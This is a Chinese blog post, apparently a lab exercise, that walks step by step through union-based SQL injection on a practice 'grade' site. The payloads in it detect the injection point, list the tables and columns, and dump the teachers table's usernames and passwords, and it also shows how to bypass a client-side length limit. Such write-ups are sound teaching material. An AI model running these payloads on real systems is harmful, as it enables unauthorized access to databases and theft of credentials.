sql注入练习

最新推荐文章于 2024-05-07 23:35:00 发布
最新推荐文章于 2024-05-07 23:35:00 发布
阅读量3.5k 收藏
点赞数
文章标签: sql 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/q998940091/article/details/121430143
版权

对grade网站进行漏洞探测,爆出任意表的账号密码。

基本信息:
网站截图
在这里插入图片描述

1.对grade网站进行漏洞探测,爆出任意表的账号密码。
在查询学号处
1) 猜测的用户admin,查询学号成功
在这里插入图片描述

2)输入 admin and 1=1,发现能够正确执行没有报错,但没有查出学号,说明可能是字符型注入

admin and 1=1

在这里插入图片描述

3)输入admin’ and 1=1 – - ,执行成功,且查出学号,确定是字符型注入

admin' and 1=1 -- -

在这里插入图片描述

4)order by 判断显示字段数
admin’ order by 1 – - 正常显示;
admin' order by 1 -- -在这里插入图片描述

admin’ order by 2 – -异常,故只有一个字段显示,可构造union slect 1

admin' order by 2 -- - 在这里插入图片描述

5)爆库:admin’ union select database() – -,数据库grade
admin' union select database() -- -在这里插入图片描述

6)爆表:admin’ union select group_concat(table_name) from information_schema.tables where table_schema =‘grade’ – -

admin' union select group_concat(table_name) from information_schema.tables where table_schema ='grade' -- -

在这里插入图片描述

查询结果:
admins,classes,english,networks,students,teachers

注:在输入sql注入语句时,发现输入数据长度被限制,出现以下错误:
在这里插入图片描述

可以在输入栏右键 -->检查 –> 在中maxlength="50"删去,就可以输入更多数据了
在这里插入图片描述

7)爆字段(teachers表):
admin’ union select group_concat(column_name) from information_schema.columns where table_schema =‘grade’ and table_name = ‘teachers’ – -

admin' union select group_concat(column_name) from information_schema.columns where table_schema ='grade' and table_name = 'teachers' -- -

在这里插入图片描述

查询结果:
id,name,pass

8)爆数据:
admin’ union select group_concat(id,0x23,name,0x23,pass) from teachers – -

admin' union select group_concat(id,0x23,name,0x23,pass) from teachers

在这里插入图片描述

查询结果:
2001#fengwanzhong#feng001,2002#yunankun#yu002
0x23表示#
这里用#分隔字段,逗号分隔行;

这里只是对该网站比较简单是sql注入,还有其他的注入点和注入方式不作过多讨论。

幻未见
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【CISP-PTE】SQL注入练习
西原一点红的博客
06-26 1450
得到 flag n1book{union_select_is_so_cool}通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件中。爆出有两个表 Article IS_KEY。发现回显内容被截取,结果显示不全,参考文档。sqlmap注入并执行sql-shell。题目明确提示过滤了注释符 # –sqlmap执行sql shell。发现列数为6时,回显字段2。
SQLMap使用详解
热门推荐
未完成的歌~的博客
02-19 2万+
文章目录前言:一、SQLMap介绍1、Sqlmap简介:2、Sqlmap支持的注入方式:二、SQLMap安装三、SQLMap使用:1、判断是否存在注入:2、判断文本中的请求是否存在注入:3、查询当前用户下的所有数据库:4、获取数据库中的表名:5、获取表中的字段名:6、获取字段内容:7、获取数据库的所有用户:8、获取数据库用户的密码:9、获取当前网站数据库的名称:10、获取当前网站数据库的用户名称:四、SQLMap进阶:参数讲解1、-- level 5:探测等级2、-- is-dba:当前用户是否为管理权限3
sql注入---sqli靶场1-9
最新发布
weixin_72202802的博客
05-07 496
SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至篡改数据库。
渗透测试---手把手教你sqlmap数据库注入测试(2)---用法汇总篇
weixin_52796034的博客
10-14 294
在上一篇文章中,一方结合具体的靶场关卡,初步讲述了SQLMAPSQL注入中的运用,但是上一篇文章只是粗浅地讲解了SQLMAP的粗浅使用,涉及的SQLMAP参数只有寥寥十余个,远远没有展现出SQLMAPSQL注入中的"神器"作用,实际上SQLMAP的使用远非区区几篇博文可以阐述透彻的,这里一方针对SQLMAPSQL注入实战中可能用到的参数和功能进行了总结与拓展(相当于SQLMAP帮助文档的汉化拓展),以期方便各位读者大大在使用SQLMAP时可以随时查阅。
SQL注入的相关例题(ctfhub)
2401_82388450的博客
04-01 804
例题。
SQL注入--靶场练习
wmr123456001的博客
02-11 1996
SQL注入靶场练习
sql注入练习工具
11-08
SQL注入是一种常见的网络安全漏洞,它发生在应用程序未能充分验证或过滤用户输入的数据,导致恶意SQL代码被插入到数据库查询中。这种攻击方式可以让攻击者获取、修改、删除数据库中的敏感信息,甚至完全控制数据库...
SQL注入练习.rar
06-25
"SQL注入练习.rar" 提供了一个名为 "sql-labs" 的练习环境,专为学习和提升SQL注入技能设计。这个靶场环境采用闯关模式,由浅入深地涵盖了一系列SQL注入技术,帮助用户逐步理解并掌握这种攻击手段。 在开始之前,...
sqli:SQL注入练习
02-08
通过本“sqli:SQL注入练习”,你将有机会亲手实践如何检测和防止SQL注入,理解其工作原理,并提升你的PHP安全编程能力。同时,了解和掌握这些技能对于任何Web开发者来说都是至关重要的,以保护用户的个人信息和系统...
[SQL注入练习]K8-ASP渗透环境[K8team].rar
05-08
在这个"[SQL注入练习]K8-ASP渗透环境[K8team].rar"压缩包中,包含了一个专门用于学习和实践SQL注入技巧的ASP渗透环境。这个环境可能是由K8team团队创建的,他们可能是一个专注于网络安全研究或培训的组织。 首先,...
sql注入靶场.zip
06-24
靶场的核心是sqli-labs,这是一个开源的SQL注入练习平台,特别适合初学者和专业人士用来增强对SQL注入的理解。它模拟了各种类型的SQL注入漏洞,包括但不限于错误基线注入、时间基线注入、盲注、联合查询注入、堆叠...
考试必备SQL试题
12-04
.net考试相关的一些SQL试题含答案,希望对你有用!
SQL注入练习--sqli-labs
qq_46263951的博客
02-12 2676
前言 SQL注入是比较常见的漏洞,有数据库的地方就可能存在SQL注入,所以学好SQL注入是非常有必要的,sqli-labs是一个不错的练习靶场。推荐一篇文章SQL注入之Mysql注入姿势及绕过总结 前置知识 注入流程 判断是否存在注入,注入是字符型还是数字型,闭合情况,绕过方式 ?id=1' ?id=1" ?id=1') ?id=1") ?id=1' or 1# ?id=1' or 0# ?id=1' or 1=1# ?id=1' and 1=2# ?id=1' and sleep(5)# ?id=
一次简单的SQL注入靶场练习
lza20001103的博客
07-24 4079
一次简单的SQL注入靶场练习
SQLi-LABS 1-22关(Basic Challenges) 手动注入--(缓慢更新中 12/22)
燕麦葡萄干的博客
11-18 3485
首先判断注入类型,分别使用?时间注入是利用sleep()或benchmark()等函数让MySQL的执行时间变长,时间盲注多与if(expr1,expr2,expr3)结合使用,此if语句意思为:如果expr1是TRUE,则if()的返回值是expr2;进入到MySQL所在目录,我这里是D:\software\phpstudy_pro\Extensions\MySQL5.7.26\bin,目录栏直接输入cmd调出cmd终端,输入mysql -u root -p ,然后输入密码即可成功登陆数据库。
PIKACHU靶场 ——字符和数字型SQL注入练习
PICACHU+++的博客
04-03 842
进入靶场可以看见一个输入框,所以现在里面判断注入点类型,在输入框中输入了1'后,报错,并且显示到URL中,判断参数提交方式为GET传参在URL栏中输入了一下语句,判断为字符型SQL注入漏洞1' #报错1'and'1'='1 #未报错1'and'1'='2 #未报错综上为字符型SQL注入漏洞。
sql注入,基础练习1-4关卡
haozhe6666的博客
07-20 367
程序员为了防止sql注入,对用户输入中的单引号(')进行处理,在单引号前加上斜杠(\)进行转义,这样被处理后的sql语句中,单引 号不再具有‘作用’,仅仅是‘内容’而已,换句话说,这个单引号无法发挥和前后单引号闭合的作用,仅仅成为‘内容’;相信大家一定能发现它们之间的微小的区别,这也是数字型和字符型上的一个重要的区别,接下来的注入过程,我们只需要去想方设法的闭合掉 '$id' 前面的'和后面的语句及符号就ok了,然后后面的就是进行正常的一个注入过程了。要进行注入,得先知道是否能进行注入。
SQL注入练习
qq_49422880的博客
07-31 791
[GYCTF2020]Ezsqli 这道题输入几个数字之后,我就感觉就是要用盲注暴力破解。所以就看看报错的内容是什么,进行异或注入即可。 输入1的时候显示 输入2的时侯显示 输到三的时候 Error Occured When Fetch Result. 输到十的时候 Error Occured When Fetch Result. 随便输入字符 bool(false) 嘿嘿,基本确定是要跑脚本暴力破解。 先做fuzz测试,看看过滤掉哪些关键词 handler INFORMATION,还有很多… 1.开
ElasticSearch
Blanklr的博客
10-13 530
ElasticSearch 是非关系型数据库 官网: www.elastic.co,是基于Lucene的搜索服务器 关系型数据库查询的弊端 : 性能低、功能弱 ES是弥补这一缺点而诞生的 1.性能低 模糊查询 一条条的遍历 2.功能弱 存储的都是字符串 不能在商品信息字段中 查询出 含有华为或手机的 倒排索引 将各个文档中的内容进行分词、形成词条。然后记录词条和数据的唯一标识的对应关系,形成的产物。是一个散列图 存储原理 1.在index索引库中 生成数据表,即把所有的文档都进行分词
CTFsql注入练习
07-29
回答: CTFsql注入练习题是一种用于训练和测试SQL注入技巧的题目。在这些题目中,参与者需要通过注入恶意的SQL代码来绕过应用程序的安全机制,从而获取敏感信息或者执行未授权的操作。这些题目通常包含了不同的注入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值